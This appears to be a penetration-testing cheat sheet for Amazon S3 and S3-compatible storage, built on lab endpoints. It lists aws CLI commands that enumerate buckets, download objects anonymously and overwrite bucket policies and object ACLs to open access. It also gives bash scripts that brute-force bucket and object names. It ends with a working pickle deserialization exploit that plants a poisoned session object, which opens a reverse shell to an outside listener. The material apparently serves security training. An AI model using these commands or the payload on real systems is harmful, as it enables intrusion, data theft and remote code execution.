S3

Description

Amazon S3 (Simple Storage Service) is a service offered by Amazon Web Services (AWS) that provides object storage through a web service interface. It uses the same scalable storage infrastructure that Amazon.com uses to run its e-commerce network.

Usage

bucket-name.s3-website-<region>.amazonaws.com
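The static-website endpoint embeds the bucket's region in the hostname. A trivial helper sketching the format (the bucket and region values are placeholders):

```python
# Build the S3 static-website endpoint for a bucket;
# the region is part of the hostname, not a query parameter.
def website_endpoint(bucket: str, region: str) -> str:
    return f"{bucket}.s3-website-{region}.amazonaws.com"

print(website_endpoint("bucket-name", "us-east-1"))
# bucket-name.s3-website-us-east-1.amazonaws.com
```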

Enumeration

aws --endpoint http://192.50.19.3:9000 s3api list-buckets # list all buckets
aws --endpoint http://192.50.19.3:9000 s3 ls s3://hello-world # list objects in a bucket
aws --endpoint http://192.50.19.3:9000 s3 cp s3://hello-world/flag ./ # download an object
aws --endpoint http://192.50.19.3:9000 s3 cp ./hello s3://hello-world/hello # upload an object
aws --endpoint http://192.50.19.3:9000 s3api get-bucket-policy --bucket welcome # read the bucket policy
aws --endpoint http://192.50.19.3:9000 s3api put-bucket-policy --policy file:///root/policy.json --bucket welcome # overwrite the bucket policy
aws --endpoint http://192.50.19.3:9000 s3 rm s3://hello-world/welcome # delete an object

aws s3api list-buckets
aws s3api list-objects --bucket <bucket-name>
aws s3api get-bucket-policy --bucket <bucket-name> --output text | python3 -m json.tool # Check the Resource field for filename leaks and whether a Condition exists
aws s3api put-bucket-policy --bucket <bucket-name> --policy file://policy.json # Same policy file, but change "Effect" to "Allow"
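For orientation, policy.json might look like the following after flipping the effect; the bucket name and actions are illustrative:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": ["s3:GetObject", "s3:PutObject"],
      "Resource": "arn:aws:s3:::<bucket-name>/*"
    }
  ]
}
```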

aws s3api get-object-acl --bucket <bucket-name> --key flag > objacl.json # Check the Permission field (look for FULL_CONTROL)
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json
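A sketch of what the objacl.json above typically contains; the owner ID is a placeholder, and this variant grants FULL_CONTROL to the AllUsers group:

```json
{
  "Owner": {
    "DisplayName": "owner",
    "ID": "<canonical-user-id>"
  },
  "Grants": [
    {
      "Grantee": {
        "Type": "Group",
        "URI": "http://acs.amazonaws.com/groups/global/AllUsers"
      },
      "Permission": "FULL_CONTROL"
    }
  ]
}
```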

aws s3 --no-sign-request --region ap-southeast-1 ls s3://lab-webapp-static-resources
aws s3 --no-sign-request --region ap-southeast-1 ls s3://lab-webapp-static-resources/scripts
aws s3 --no-sign-request --region ap-southeast-1 cp s3://lab-webapp-static-resources/scripts/backup.sh ./

Brute-Force Object Names

#!/bin/bash
# Usage: ./find.sh <endpoint> <wordlist>
while read -r F ; do
  count=$(curl -s "$1/public/$F" | grep -c "The specified key does not exist.")
  if [[ $count -eq 0 ]]
  then
    echo "Object Found: $F"
  fi
done < "$2"

./find.sh 192.137.54.3:9000 /usr/share/dirb/wordlists/small.txt

aws --endpoint http://192.137.54.3:9000 --no-sign-request s3 cp s3://public/index ./

Brute-Force Bucket Names

#!/bin/bash
# Usage: ./find.sh <endpoint> <wordlist>
while read -r F ; do
  count=$(curl -s "$1/$F" | grep -cE "NoSuchBucket|InvalidBucketName")
  if [[ $count -eq 0 ]]
  then
    echo "Bucket Found: $F"
  fi
done < "$2"

./find.sh 192.17.236.3:9000 /usr/share/dirb/wordlists/small.txt

Read S3 Session Objects

import pickle

import boto3
from botocore import UNSIGNED
from botocore.config import Config

# Unsigned (anonymous) client against the lab endpoint
s3 = boto3.client('s3', endpoint_url='http://s3.pentesteracademylab.appspot.com', config=Config(signature_version=UNSIGNED))
obj = s3.get_object(Bucket='assets', Key='sessions/43085237187070924862845585858148322582')
data = obj['Body'].read()
print(pickle.loads(data))

Deserialization Attack Using Pickle on Session Objects

import os
import pickle

import boto3
from botocore import UNSIGNED
from botocore.config import Config

class Shell(object):
  def __reduce__(self):
    # On unpickling, the victim calls os.system() with this reverse-shell payload
    return (os.system, ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.162.63.2\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&",))

# Start a listener (e.g. nc -lvnp 1234) on 192.162.63.2 before the victim loads this object
s3 = boto3.client('s3', endpoint_url='http://s3.pentesteracademylab.appspot.com', config=Config(signature_version=UNSIGNED))
pickledData = pickle.dumps(Shell())
s3.put_object(Bucket='assets', Key='sessions/43085237187070924862845585858148322582', Body=pickledData)
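Why this works: pickle.loads calls the callable returned by __reduce__ with the given arguments, so whoever deserializes the session object executes the command. A harmless local sketch of the mechanism, running the no-op command true instead of a reverse shell:

```python
import os
import pickle

class Demo:
    def __reduce__(self):
        # Unpickling will call os.system("true")
        return (os.system, ("true",))

payload = pickle.dumps(Demo())
ret = pickle.loads(payload)  # the command executes here, during deserialization
print(ret)  # exit status of `true`: 0
```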

Resources